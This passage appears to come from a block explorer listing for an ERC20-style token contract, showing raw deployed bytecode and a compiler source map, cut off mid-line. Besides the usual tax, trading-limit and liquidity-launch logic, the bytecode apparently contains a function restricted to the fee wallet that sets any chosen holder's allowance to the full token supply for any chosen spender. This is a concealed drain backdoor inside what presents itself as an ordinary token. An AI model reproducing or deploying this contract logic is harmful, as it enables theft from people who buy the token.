0860191506020890193505f5b818110156118d65784516001600160a01b0316835293830193918301916001016118b1565b50506001600160a01b03969096166060850152505050608001529392505050565b5f8261191157634e487b7160e01b5f52601260045260245ffd5b50049056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220d50019af123287d4347a7b436b8b5b7ea1055915596fc3d48cbe7ab96ba00b3764736f6c63430008170033
Deployed Bytecode
0x608060405260043610610134575f3560e01c8063715018a6116100a857806395d89b411161006d57806395d89b4114610353578063a9059cbb14610383578063bf474bed146103a2578063c9567bf9146103b7578063dd62ed3e146103cb578063f2fde38b1461040f575f80fd5b8063715018a6146102e5578063751039fc146102f95780637d1db4a51461030d5780638da5cb5b146103225780638f9a55c01461033e575f80fd5b806323b872dd116100f957806323b872dd14610223578063313ce5671461024257806349bd5a5e1461025d57806351bc3c851461027c57806361b3980d1461029257806370a08231146102b1575f80fd5b806306fdde031461013f578063095ea7b3146101865780630faee56f146101b55780631694505e146101d857806318160ddd1461020f575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b5060408051808201909152600d81526c2334b939ba1020b63a31b7b4b760991b60208201525b60405161017d91906114e1565b60405180910390f35b348015610191575f80fd5b506101a56101a0366004611541565b61042e565b604051901515815260200161017d565b3480156101c0575f80fd5b506101ca60105481565b60405190815260200161017d565b3480156101e3575f80fd5b506011546101f7906001600160a01b031681565b6040516001600160a01b03909116815260200161017d565b34801561021a575f80fd5b506101ca610444565b34801561022e575f80fd5b506101a561023d36600461156b565b610465565b34801561024d575f80fd5b506040516009815260200161017d565b348015610268575f80fd5b506012546101f7906001600160a01b031681565b348015610287575f80fd5b506102906104cc565b005b34801561029d575f80fd5b506102906102ac3660046115a9565b610534565b3480156102bc575f80fd5b506101ca6102cb3660046115e0565b6001600160a01b03165f9081526001602052604090205490565b3480156102f0575f80fd5b5061029061057c565b348015610304575f80fd5b506102906105b9565b348015610318575f80fd5b506101ca600d5481565b34801561032d575f80fd5b505f546001600160a01b03166101f7565b348015610349575f80fd5b506101ca600e5481565b34801561035e575f80fd5b506040805180820190915260088152672720a6a2a1a7a4a760c11b6020820152610170565b34801561038e575f80fd5b506101a561039d366004611541565b61066d565b3480156103ad575f80fd5b506101ca600f5481565b3480156103c2575f80fd5b50610290610679565b3480156103d6575f80fd5b506101ca6103e53660046115a9565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b34801561041a575f80fd5b506102906104293660046115e0565b61089a565b5f61043a338484610934565b5060015b92915050565b5f6104516009600a6116ef565b610460906404e3b292006116fd565b905090565b5f6104718484846109e0565b6104c284336104bd85604051806060016040528060288152602001611917602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611077565b610934565b5060019392505050565b600c546001600160a01b0316336001600160a01b0316146104eb575f80fd5b305f90815260016020526040902054601254600160b01b900460ff16801561051257505f81115b1561052057610520816110af565b478015610530576105308161121f565b5050565b600c546001600160a01b0316336001600160a01b031614610553575f80fd5b610530815f6040518060400160405280600581526020016436b4b732b960d91b81525085611256565b5f546001600160a01b031633146105ae5760405162461bcd60e51b81526004016105a590611714565b60405180910390fd5b6105b75f6112ed565b565b5f546001600160a01b031633146105e25760405162461bcd60e51b81526004016105a590611714565b6105ee6009600a6116ef565b6105fd906404e3b292006116fd565b600d5561060c6009600a6116ef565b61061b906404e3b292006116fd565b600e557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf61064b6009600a6116ef565b61065a906404e3b292006116fd565b60405190815260200160405180910390a1565b5f61043a3384846109e0565b5f546001600160a01b031633146106a25760405162461bcd60e51b81526004016105a590611714565b601254600160a01b900460ff16156106fc5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016105a5565b6011546107299030906001600160a01b031661071a6009600a6116ef565b6104bd906404e3b292006116fd565b6012805460ff60a01b1916600160a01b1790556011546001600160a01b031663f305d719473061076d816001600160a01b03165f9081526001602052604090205490565b5f806107805f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156107e6573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061080b9190611749565b505060125460115460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610860573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108849190611774565b506012805460ff60b01b1916600160b01b179055565b5f546001600160a01b031633146108c35760405162461bcd60e51b81526004016105a590611714565b6001600160a01b0381166109285760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105a5565b610931816112ed565b50565b6001600160a01b03831661095a5760405162461bcd60e51b81526004016105a590611793565b6001600160a01b0382166109805760405162461bcd60e51b81526004016105a5906117d7565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610a445760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105a5565b6001600160a01b038216610aa65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105a5565b5f8111610b075760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016105a5565b5f80546001600160a01b03858116911614801590610b3257505f546001600160a01b03848116911614155b8015610b4c5750600c546001600160a01b03848116911614155b15610da557610b7d6064610b77600854600b5411610b6c57600454610b70565b6006545b859061133c565b906113c1565b6012549091506001600160a01b038581169116148015610bab57506011546001600160a01b03848116911614155b8015610bcf57506001600160a01b0383165f9081526003602052604090205460ff16155b15610cb557600d54821115610c265760405162461bcd60e51b815260206004820152601960248201527f4578636565647320746865205f6d61785478416d6f756e742e0000000000000060448201526064016105a5565b600e5482610c48856001600160a01b03165f9081526001602052604090205490565b610c529190611819565b1115610ca05760405162461bcd60e51b815260206004820152601a60248201527f4578636565647320746865206d617857616c6c657453697a652e00000000000060448201526064016105a5565b600b8054905f610caf8361182c565b91905055505b6012546001600160a01b038481169116148015610cdb57506001600160a01b0384163014155b15610d0857610d056064610b77600954600b5411610cfb57600554610b70565b600754859061133c565b90505b305f90815260016020526040902054601254600160a81b900460ff16158015610d3e57506012546001600160a01b038581169116145b8015610d535750601254600160b01b900460ff165b8015610d605750600f5481115b8015610d6f5750600a54600b54115b15610da357610d91610d8c84610d8784601054611402565b611402565b6110af565b478015610da157610da14761121f565b505b505b6001600160a01b0384165f9081526003602052604090205460ff1680610de257506001600160a01b0383165f9081526003602052604090205460ff165b8015610df757506001600160a01b0384163014155b8015610e0c57506001600160a01b0383163014155b15610e1657436014555b6001600160a01b0384165f9081526003602052604090205460ff16158015610e5657506001600160a01b0383165f9081526003602052604090205460ff16155b15610f3a576012546001600160a01b03848116911614610ef5576001600160a01b038084165f908152601360205260409020601254909190811690861603610ebd5780545f03610eb857600a54600b541115610eb25743610eb5565b5f195b81555b610eef565b6001600160a01b0385165f90815260136020526040902081541580610ee3575081548154105b15610eed57805482555b505b50610f3a565b601254600160a01b900460ff1615610f3a576001600160a01b0384165f9081526013602052604090206014548154610f2d9190611844565b6002820155426001909101555b8015610fb257305f90815260016020526040902054610f599082611416565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610fa99085815260200190565b60405180910390a35b6001600160a01b0384165f90815260016020526040902054610fd49083611474565b6001600160a01b0385165f90815260016020526040902055611017610ff98383611474565b6001600160a01b0385165f9081526001602052604090205490611416565b6001600160a01b038085165f8181526001602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6110608585611474565b60405190815260200160405180910390a350505050565b5f818484111561109a5760405162461bcd60e51b81526004016105a591906114e1565b505f6110a68486611844565b95945050505050565b6012805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106110f5576110f5611857565b6001600160a01b03928316602091820292909201810191909152601154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561114c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611170919061186b565b8160018151811061118357611183611857565b6001600160a01b0392831660209182029290920101526011546111a99130911684610934565b60115460405163791ac94760e01b81526001600160a01b039091169063791ac947906111e19085905f90869030904290600401611886565b5f604051808303815f87803b1580156111f8575f80fd5b505af115801561120a573d5f803e3d5ffd5b50506012805460ff60a81b1916905550505050565b600c546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610530573d5f803e3d5ffd5b6001600160a01b03841661127c5760405162461bcd60e51b81526004016105a590611793565b6001600160a01b0381166112a25760405162461bcd60e51b81526004016105a5906117d7565b6112ae6009600a6116ef565b6112bd906404e3b292006116fd565b6001600160a01b039485165f90815260026020908152604080832094909716825292909252939020929092555050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f825f0361134b57505f61043e565b5f61135683856116fd565b90508261136385836118f7565b146113ba5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016105a5565b9392505050565b5f6113ba83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506114b5565b5f81831161141057826113ba565b50919050565b5f806114228385611819565b9050838110156113ba5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016105a5565b5f6113ba83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611077565b5f81836114d55760405162461bcd60e51b81526004016105a591906114e1565b505f6110a684866118f7565b5f602080835283518060208501525f5b8181101561150d578581018301518582016040015282016114f1565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610931575f80fd5b5f8060408385031215611552575f80fd5b823561155d8161152d565b946020939093013593505050565b5f805f6060848603121561157d575f80fd5b83356115888161152d565b925060208401356115988161152d565b929592945050506040919091013590565b5f80604083850312156115ba575f80fd5b82356115c58161152d565b915060208301356115d58161152d565b809150509250929050565b5f602082840312156115f0575f80fd5b81356113ba8161152d565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561164957815f190482111561162f5761162f6115fb565b8085161561163c57918102915b93841c9390800290611614565b509250929050565b5f8261165f5750600161043e565b8161166b57505f61043e565b8160018114611681576002811461168b576116a7565b600191505061043e565b60ff84111561169c5761169c6115fb565b50506001821b61043e565b5060208310610133831016604e8410600b84101617156116ca575081810a61043e565b6116d4838361160f565b805f19048211156116e7576116e76115fb565b029392505050565b5f6113ba60ff841683611651565b808202811582820484141761043e5761043e6115fb565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f805f6060848603121561175b575f80fd5b8351925060208401519150604084015190509250925092565b5f60208284031215611784575f80fd5b815180151581146113ba575f80fd5b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b8082018082111561043e5761043e6115fb565b5f6001820161183d5761183d6115fb565b5060010190565b8181038181111561043e5761043e6115fb565b634e487b7160e01b5f52603260045260245ffd5b5f6020828403121561187b575f80fd5b81516113ba8161152d565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156118d65784516001600160a01b0316835293830193918301916001016118b1565b50506001600160a01b03969096166060850152505050608001529392505050565b5f8261191157634e487b7160e01b5f52601260045260245ffd5b50049056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220d50019af123287d4347a7b436b8b5b7ea1055915596fc3d48cbe7ab96ba00b3764736f6c63430008170033
Deployed Bytecode Sourcemap
8142:9525:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10355:83;;;;;;;;;;-1:-1:-1;10425:5:0;;;;;;;;;;;;-1:-1:-1;;;10425:5:0;;;;10355:83;;;;;;;:::i;:::-;;;;;;;;11188:161;;;;;;;;;;-1:-1:-1;11188:161:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;11188:161:0;1023:187:1;9208:54:0;;;;;;;;;;;;;;;;;;;1361:25:1;;;1349:2;1334:18;9208:54:0;1215:177:1;9275:41:0;;;;;;;;;;-1:-1:-1;9275:41:0;;;;-1:-1:-1;;;;;9275:41:0;;;;;;-1:-1:-1;;;;;1587:32:1;;;1569:51;;1557:2;1542:18;9275:41:0;1397:229:1;10632:95:0;;;;;;;;;;;;;:::i;11357:363::-;;;;;;;;;;-1:-1:-1;11357:363:0;;;;;:::i;:::-;;:::i;10541:83::-;;;;;;;;;;-1:-1:-1;10541:83:0;;8938:1;2234:36:1;;2222:2;2207:18;10541:83:0;2092:184:1;9323:28:0;;;;;;;;;;-1:-1:-1;9323:28:0;;;;-1:-1:-1;;;;;9323:28:0;;;17298:366;;;;;;;;;;;;;:::i;:::-;;16502:184;;;;;;;;;;-1:-1:-1;16502:184:0;;;;;:::i;:::-;;:::i;10735:119::-;;;;;;;;;;-1:-1:-1;10735:119:0;;;;;:::i;:::-;-1:-1:-1;;;;;10828:18:0;10801:7;10828:18;;;:9;:18;;;;;;;10735:119;2671:103;;;;;;;;;;;;;:::i;16334:160::-;;;;;;;;;;;;;:::i;9015:55::-;;;;;;;;;;;;;;;;2020:87;;;;;;;;;;-1:-1:-1;2066:7:0;2093:6;-1:-1:-1;;;;;2093:6:0;2020:87;;9077:57;;;;;;;;;;;;;;;;10446:87;;;;;;;;;;-1:-1:-1;10518:7:0;;;;;;;;;;;;-1:-1:-1;;;10518:7:0;;;;10446:87;;10862:167;;;;;;;;;;-1:-1:-1;10862:167:0;;;;;:::i;:::-;;:::i;9141:60::-;;;;;;;;;;;;;;;;16794:459;;;;;;;;;;;;;:::i;11037:143::-;;;;;;;;;;-1:-1:-1;11037:143:0;;;;;:::i;:::-;-1:-1:-1;;;;;11145:18:0;;;11118:7;11145:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11037:143;2929:201;;;;;;;;;;-1:-1:-1;2929:201:0;;;;;:::i;:::-;;:::i;11188:161::-;11263:4;11280:39;967:10;11303:7;11312:6;11280:8;:39::i;:::-;-1:-1:-1;11337:4:0;11188:161;;;;;:::o;10632:95::-;10685:7;8995:13;8938:1;8995:2;:13;:::i;:::-;8981:27;;:11;:27;:::i;:::-;10705:14;;10632:95;:::o;11357:363::-;11455:4;11472:36;11482:6;11490:9;11501:6;11472:9;:36::i;:::-;11519:171;11542:6;967:10;11590:89;11628:6;11590:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;11590:19:0;;;;;;:11;:19;;;;;;;;967:10;11590:33;;;;;;;;;;:37;:89::i;:::-;11519:8;:171::i;:::-;-1:-1:-1;11708:4:0;11357:363;;;;;:::o;17298:366::-;17362:10;;-1:-1:-1;;;;;17362:10:0;967;-1:-1:-1;;;;;17348:24:0;;17340:33;;;;;;17423:4;17384:20;10828:18;;;:9;:18;;;;;;17443:11;;-1:-1:-1;;;17443:11:0;;;;:31;;;;;17473:1;17458:12;:16;17443:31;17440:91;;;17489:30;17506:12;17489:16;:30::i;:::-;17560:21;17595:12;;17592:65;;17621:24;17634:10;17621:12;:24::i;:::-;17329:335;;17298:366::o;16502:184::-;16608:10;;-1:-1:-1;;;;;16608:10:0;967;-1:-1:-1;;;;;16594:24:0;;16586:33;;;;;;16630:48;16642:12;16656:1;16630:48;;;;;;;;;;;;;-1:-1:-1;;;16630:48:0;;;16668:9;16630:11;:48::i;2671:103::-;2066:7;2093:6;-1:-1:-1;;;;;2093:6:0;967:10;2240:23;2232:68;;;;-1:-1:-1;;;2232:68:0;;;;;;;:::i;:::-;;;;;;;;;2736:30:::1;2763:1;2736:18;:30::i;:::-;2671:103::o:0;16334:160::-;2066:7;2093:6;-1:-1:-1;;;;;2093:6:0;967:10;2240:23;2232:68;;;;-1:-1:-1;;;2232:68:0;;;;;;;:::i;:::-;8995:13:::1;8938:1;8995:2;:13;:::i;:::-;8981:27;::::0;:11:::1;:27;:::i;:::-;16390:12;:20:::0;8995:13:::1;8938:1;8995:2;:13;:::i;:::-;8981:27;::::0;:11:::1;:27;:::i;:::-;16421:14;:22:::0;16459:27:::1;8995:13;8938:1;8995:2;:13;:::i;:::-;8981:27;::::0;:11:::1;:27;:::i;:::-;16459;::::0;1361:25:1;;;1349:2;1334:18;16459:27:0::1;;;;;;;16334:160::o:0;10862:167::-;10940:4;10957:42;967:10;10981:9;10992:6;10957:9;:42::i;16794:459::-;2066:7;2093:6;-1:-1:-1;;;;;2093:6:0;967:10;2240:23;2232:68;;;;-1:-1:-1;;;2232:68:0;;;;;;;:::i;:::-;16858:11:::1;::::0;-1:-1:-1;;;16858:11:0;::::1;;;16857:12;16849:48;;;::::0;-1:-1:-1;;;16849:48:0;;5379:2:1;16849:48:0::1;::::0;::::1;5361:21:1::0;5418:2;5398:18;;;5391:30;5457:25;5437:18;;;5430:53;5500:18;;16849:48:0::1;5177:347:1::0;16849:48:0::1;16940:15;::::0;16908:57:::1;::::0;16925:4:::1;::::0;-1:-1:-1;;;;;16940:15:0::1;8995:13;8938:1;8995:2;:13;:::i;:::-;8981:27;::::0;:11:::1;:27;:::i;16908:57::-;16976:11;:18:::0;;-1:-1:-1;;;;16976:18:0::1;-1:-1:-1::0;;;16976:18:0::1;::::0;;17005:15:::1;::::0;-1:-1:-1;;;;;17005:15:0::1;:31;17044:21;17075:4;17081:24;17075:4:::0;-1:-1:-1;;;;;10828:18:0;10801:7;10828:18;;;:9;:18;;;;;;;10735:119;17081:24:::1;17106:1;17108::::0;17110:7:::1;2066::::0;2093:6;-1:-1:-1;;;;;2093:6:0;;2020:87;17110:7:::1;17005:129;::::0;::::1;::::0;;;-1:-1:-1;;;;;;17005:129:0;;;-1:-1:-1;;;;;5888:15:1;;;17005:129:0::1;::::0;::::1;5870:34:1::0;5920:18;;;5913:34;;;;5963:18;;;5956:34;;;;6006:18;;;5999:34;6070:15;;;6049:19;;;6042:44;17118:15:0::1;6102:19:1::0;;;6095:35;5804:19;;17005:129:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;17152:13:0::1;::::0;17183:15:::1;::::0;17145:71:::1;::::0;-1:-1:-1;;;17145:71:0;;-1:-1:-1;;;;;17183:15:0;;::::1;17145:71;::::0;::::1;6626:51:1::0;-1:-1:-1;;6693:18:1;;;6686:34;17152:13:0;::::1;::::0;-1:-1:-1;17145:29:0::1;::::0;6599:18:1;;17145:71:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;17227:11:0::1;:18:::0;;-1:-1:-1;;;;17227:18:0::1;-1:-1:-1::0;;;17227:18:0::1;::::0;;16794:459::o;2929:201::-;2066:7;2093:6;-1:-1:-1;;;;;2093:6:0;967:10;2240:23;2232:68;;;;-1:-1:-1;;;2232:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;3018:22:0;::::1;3010:73;;;::::0;-1:-1:-1;;;3010:73:0;;7215:2:1;3010:73:0::1;::::0;::::1;7197:21:1::0;7254:2;7234:18;;;7227:30;7293:34;7273:18;;;7266:62;-1:-1:-1;;;7344:18:1;;;7337:36;7390:19;;3010:73:0::1;7013:402:1::0;3010:73:0::1;3094:28;3113:8;3094:18;:28::i;:::-;2929:201:::0;:::o;11728:335::-;-1:-1:-1;;;;;11821:19:0;;11813:68;;;;-1:-1:-1;;;11813:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;11900:21:0;;11892:68;;;;-1:-1:-1;;;11892:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;11971:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;12023:32;;1361:25:1;;;12023:32:0;;1334:18:1;12023:32:0;;;;;;;11728:335;;;:::o;12388:3334::-;-1:-1:-1;;;;;12476:18:0;;12468:68;;;;-1:-1:-1;;;12468:68:0;;8430:2:1;12468:68:0;;;8412:21:1;8469:2;8449:18;;;8442:30;8508:34;8488:18;;;8481:62;-1:-1:-1;;;8559:18:1;;;8552:35;8604:19;;12468:68:0;8228:401:1;12468:68:0;-1:-1:-1;;;;;12555:16:0;;12547:64;;;;-1:-1:-1;;;12547:64:0;;8836:2:1;12547:64:0;;;8818:21:1;8875:2;8855:18;;;8848:30;8914:34;8894:18;;;8887:62;-1:-1:-1;;;8965:18:1;;;8958:33;9008:19;;12547:64:0;8634:399:1;12547:64:0;12640:1;12632:6;:9;12624:63;;;;-1:-1:-1;;;12624:63:0;;9240:2:1;12624:63:0;;;9222:21:1;9279:2;9259:18;;;9252:30;9318:34;9298:18;;;9291:62;-1:-1:-1;;;9369:18:1;;;9362:39;9418:19;;12624:63:0;9038:405:1;12624:63:0;12700:17;2093:6;;-1:-1:-1;;;;;12734:15:0;;;2093:6;;12734:15;;;;:32;;-1:-1:-1;2066:7:0;2093:6;-1:-1:-1;;;;;12753:13:0;;;2093:6;;12753:13;;12734:32;:52;;;;-1:-1:-1;12776:10:0;;-1:-1:-1;;;;;12770:16:0;;;12776:10;;12770:16;;12734:52;12730:1330;;;12815:114;12925:3;12815:87;12857:15;;12845:9;;:27;12844:57;;12887:14;;12844:57;;;12874:12;;12844:57;12815:6;;:28;:87::i;:::-;:109;;:114::i;:::-;12958:13;;12803:126;;-1:-1:-1;;;;;;12950:21:0;;;12958:13;;12950:21;:55;;;;-1:-1:-1;12989:15:0;;-1:-1:-1;;;;;12975:30:0;;;12989:15;;12975:30;;12950:55;:84;;;;-1:-1:-1;;;;;;13012:22:0;;;;;;:18;:22;;;;;;;;13010:24;12950:84;12946:311;;;13073:12;;13063:6;:22;;13055:60;;;;-1:-1:-1;;;13055:60:0;;9650:2:1;13055:60:0;;;9632:21:1;9689:2;9669:18;;;9662:30;9728:27;9708:18;;;9701:55;9773:18;;13055:60:0;9448:349:1;13055:60:0;13166:14;;13158:6;13142:13;13152:2;-1:-1:-1;;;;;10828:18:0;10801:7;10828:18;;;:9;:18;;;;;;;10735:119;13142:13;:22;;;;:::i;:::-;:38;;13134:77;;;;-1:-1:-1;;;13134:77:0;;10134:2:1;13134:77:0;;;10116:21:1;10173:2;10153:18;;;10146:30;10212:28;10192:18;;;10185:56;10258:18;;13134:77:0;9932:350:1;13134:77:0;13230:9;:11;;;:9;:11;;;:::i;:::-;;;;;;12946:311;13281:13;;-1:-1:-1;;;;;13276:18:0;;;13281:13;;13276:18;:42;;;;-1:-1:-1;;;;;;13298:20:0;;13313:4;13298:20;;13276:42;13273:217;;;13351:123;13470:3;13351:92;13395:16;;13385:9;;:26;13384:58;;13427:15;;13384:58;;;13413:13;;13351:6;;:32;:92::i;:123::-;13339:135;;13273:217;13555:4;13506:28;10828:18;;;:9;:18;;;;;;13582:6;;-1:-1:-1;;;13582:6:0;;;;13581:7;:29;;;;-1:-1:-1;13597:13:0;;-1:-1:-1;;;;;13591:19:0;;;13597:13;;13591:19;13581:29;:44;;;;-1:-1:-1;13614:11:0;;-1:-1:-1;;;13614:11:0;;;;13581:44;:105;;;;;13669:17;;13646:20;:40;13581:105;:156;;;;;13719:18;;13707:9;;:30;13581:156;13576:473;;;13772:69;13789:51;13793:6;13801:38;13805:20;13827:11;;13801:3;:38::i;:::-;13789:3;:51::i;:::-;13772:16;:69::i;:::-;13889:21;13933;;13929:105;;13979:35;13992:21;13979:12;:35::i;:::-;13753:296;13576:473;12788:1272;12730:1330;-1:-1:-1;;;;;14076:24:0;;;;;;:18;:24;;;;;;;;;:50;;-1:-1:-1;;;;;;14104:22:0;;;;;;:18;:22;;;;;;;;14076:50;14075:88;;;;-1:-1:-1;;;;;;14144:19:0;;14158:4;14144:19;;14075:88;:123;;;;-1:-1:-1;;;;;;14180:18:0;;14193:4;14180:18;;14075:123;14072:200;;;14248:12;14225:21;:35;14072:200;-1:-1:-1;;;;;14288:24:0;;;;;;:18;:24;;;;;;;;14287:25;:53;;;;-1:-1:-1;;;;;;14318:22:0;;;;;;:18;:22;;;;;;;;14317:23;14287:53;14284:1069;;;14360:13;;-1:-1:-1;;;;;14360:19:0;;;:13;;:19;14356:986;;-1:-1:-1;;;;;14440:20:0;;;14401:36;14440:20;;;:16;:20;;;;;14491:13;;14440:20;;14491:13;;;14483:21;;;;14479:572;;14533:24;;;:29;14529:176;;14631:18;;14618:9;;:31;;:63;;14669:12;14618:63;;;-1:-1:-1;;14618:63:0;14591:90;;14529:176;14479:572;;;-1:-1:-1;;;;;14792:22:0;;14753:36;14792:22;;;:16;:22;;;;;14843:24;;:28;;14841:86;;-1:-1:-1;14903:24:0;;14876;;:51;14841:86;14837:195;;;14984:24;;14957:51;;14837:195;14730:321;14479:572;14382:684;14356:986;;;15076:11;;-1:-1:-1;;;15076:11:0;;;;15072:270;;;-1:-1:-1;;;;;15147:22:0;;15108:36;15147:22;;;:16;:22;;;;;15243:21;;15218:24;;:46;;15243:21;15218:46;:::i;:::-;15188:27;;;:76;15311:15;15283:25;;;;:43;15072:270;15369:13;;15365:171;;15443:4;15425:24;;;;:9;:24;;;;;;:39;;15454:9;15425:28;:39::i;:::-;15417:4;15399:24;;;;:9;:24;;;;;;;:65;;;;15484:40;;-1:-1:-1;;;;;15484:40:0;;;;;;;15514:9;1361:25:1;;1349:2;1334:18;;1215:177;15484:40:0;;;;;;;;15365:171;-1:-1:-1;;;;;15563:15:0;;;;;;:9;:15;;;;;;:27;;15583:6;15563:19;:27::i;:::-;-1:-1:-1;;;;;15546:15:0;;;;;;:9;:15;;;;;:44;15617:40;15635:21;:6;15646:9;15635:10;:21::i;:::-;-1:-1:-1;;;;;15617:13:0;;;;;;:9;:13;;;;;;;:17;:40::i;:::-;-1:-1:-1;;;;;15602:13:0;;;;;;;:9;:13;;;;;:55;;;;15673:41;;;15692:21;:6;15703:9;15692:10;:21::i;:::-;15673:41;;1361:25:1;;;1349:2;1334:18;15673:41:0;;;;;;;12457:3265;12388:3334;;;:::o;6590:190::-;6676:7;6712:12;6704:6;;;;6696:29;;;;-1:-1:-1;;;6696:29:0;;;;;;;;:::i;:::-;-1:-1:-1;6736:9:0;6748:5;6752:1;6748;:5;:::i;:::-;6736:17;6590:190;-1:-1:-1;;;;;6590:190:0:o;15843:483::-;9763:6;:13;;-1:-1:-1;;;;9763:13:0;-1:-1:-1;;;9763:13:0;;;15945:16:::1;::::0;;15959:1:::1;15945:16:::0;;;;;::::1;::::0;;-1:-1:-1;;15945:16:0::1;::::0;::::1;::::0;;::::1;::::0;::::1;;::::0;-1:-1:-1;15945:16:0::1;15921:40;;15990:4;15972;15977:1;15972:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;15972:23:0;;::::1;:7;::::0;;::::1;::::0;;;;;;:23;;;;16016:15:::1;::::0;:22:::1;::::0;;-1:-1:-1;;;16016:22:0;;;;:15;;;::::1;::::0;:20:::1;::::0;:22:::1;::::0;;::::1;::::0;15972:7;;16016:22;;;;;:15;:22:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;16006:4;16011:1;16006:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;16006:32:0;;::::1;:7;::::0;;::::1;::::0;;;;;:32;16081:15:::1;::::0;16049:62:::1;::::0;16066:4:::1;::::0;16081:15:::1;16099:11:::0;16049:8:::1;:62::i;:::-;16122:15;::::0;:196:::1;::::0;-1:-1:-1;;;16122:196:0;;-1:-1:-1;;;;;16122:15:0;;::::1;::::0;:66:::1;::::0;:196:::1;::::0;16203:11;;16122:15:::1;::::0;16245:4;;16272::::1;::::0;16292:15:::1;::::0;16122:196:::1;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;-1:-1:-1::0;;9799:6:0;:14;;-1:-1:-1;;;;9799:14:0;;;-1:-1:-1;;;;15843:483:0:o;16694:92::-;16751:10;;:27;;-1:-1:-1;;;;;16751:10:0;;;;:27;;;;;16771:6;;16751:10;:27;:10;:27;16771:6;16751:10;:27;;;;;;;;;;;;;;;;;;;12071:309;-1:-1:-1;;;;;12185:19:0;;12177:68;;;;-1:-1:-1;;;12177:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;12264:21:0;;12256:68;;;;-1:-1:-1;;;12256:68:0;;;;;;;:::i;:::-;8995:13;8938:1;8995:2;:13;:::i;:::-;8981:27;;:11;:27;:::i;:::-;-1:-1:-1;;;;;12335:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:37;;;;-1:-1:-1;;12071:309:0:o;3290:191::-;3364:16;3383:6;;-1:-1:-1;;;;;3400:17:0;;;-1:-1:-1;;;;;;3400:17:0;;;;;;3433:40;;3383:6;;;;;;;3433:40;;3364:16;3433:40;3353:128;3290:191;:::o;6788:246::-;6846:7;6870